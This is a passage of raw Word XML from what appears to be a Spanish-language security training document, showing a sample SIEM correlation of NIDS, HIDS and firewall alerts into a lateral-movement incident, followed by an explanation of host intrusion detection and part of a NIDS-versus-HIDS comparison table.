            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="444444"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6A11" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># Evento 1 — NIDS — 02:14 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A12" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Fuente: sensor IDS de red</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A13" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Alerta: escaneo de puertos desde 192.168.10.5 — 200 IPs en 30 segundos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A14" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule ID: 40101 (Network scan detected)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A15" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A16" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Evento 2 — HIDS — 02:16 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A17" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Fuente: agente Wazuh en servidor BD 192.168.20.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A18" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Alerta: 5 intentos de login SSH fallidos con usuario inexistente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A19" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule ID: 5710 (SSH login attempt — non-existent user)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Evento 3 — Firewall — 02:31 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Fuente: NGFW perimetral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Alerta: conexión saliente inusual desde 192.168.20.10 → 185.22.x.x:4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule ID: FW-9901 (Outbound connection to suspicious IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A1F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A20" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Resultado — SIEM correlaciona los tres eventos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A21" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>INCIDENTE ALTA SEVERIDAD — Movimiento lateral detectado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A22" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Patrón: Reconocimiento → Acceso inicial → Exfiltración</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A23" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Origen confirmado: 192.168.10.5 (VLAN 10 — usuarios)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A24" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Sistema comprometido: 192.168.20.10 (servidor BD)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A25" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Duración del ataque: 17 minutos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A26" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Acción recomendada: aislar 192.168.10.5 de inmediato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A28" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A29" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Sin el SIEM, los tres eventos llegaron al analista como alertas individuales separadas por minutos. El analista los vio, los revisó uno por uno sin relacionarlos, y los marcó como falsos positivos. El atacante tuvo 17 minutos de ventana libre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A2A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A2B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>3. HIDS — Host Intrusion Detection System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A2C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Un HIDS es un agente instalado directamente en el host que monitorea lo que ocurre dentro del sistema operativo — procesos en ejecución, cambios en archivos, intentos de autenticación, llamadas al sistema, tráfico de red local. Mientras que el NIDS mira el cable, el HIDS mira el interior del host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A2D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A2E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>3.1 NIDS vs. HIDS: por qué necesitas ambos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80"/>
        <w:gridCol w:w="4080"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A32" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6A2F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Criterio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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2F3C6A30" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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2F3C6A31" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A36"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F3C6A33" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dónde opera</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F3C6A34" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>En la red — sensor entre el firewall y los hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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F3C6A35" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Dentro del host — agente instalado en el SO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A3A"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2F3C6A37" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Qué ve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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2F3C6A38" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Paquetes de red: IPs, puertos, protocolos, payloads sin cifrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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2F3C6A39" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Procesos, archivos, logs del SO, syscalls, tráfico ya descifrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A3E"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F3C6A3B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tráfico cifrado</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F3C6A3C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Punto ciego — no puede leer HTTPS, SSH, VPN cifrado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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F3C6A3D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Ve el contenido después del descifrado — no tiene punto ciego</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A42"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2F3C6A3F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Movimiento lateral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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2F3C6A40" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Detecta si hay tráfico anómalo entre subnets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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2F3C6A41" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Detecta si un proceso intenta conectarse a otro host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A46"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F3C6A43" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cambios en archivos</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F3C6A44" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>No puede ver cambios internos al host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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F3C6A45" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Detecta cualquier modificación a archivos monitoreados en tiempo real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A4A"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2F3C6A47" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Escalación de privilegios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="328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2F3C6A48" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>No puede detectarla — ocurre dentro del host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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2F3C6A49" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Detecta cuando un proceso obtiene permisos que no tenía</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A4E"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F3C6A4B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Falsos positivos</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F3C6A4C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Alto — mucho tráfico legítimo parece sospechoso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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F3C6A4D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Más bajo — conoce el contexto del host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A52"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2F3C6A4F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
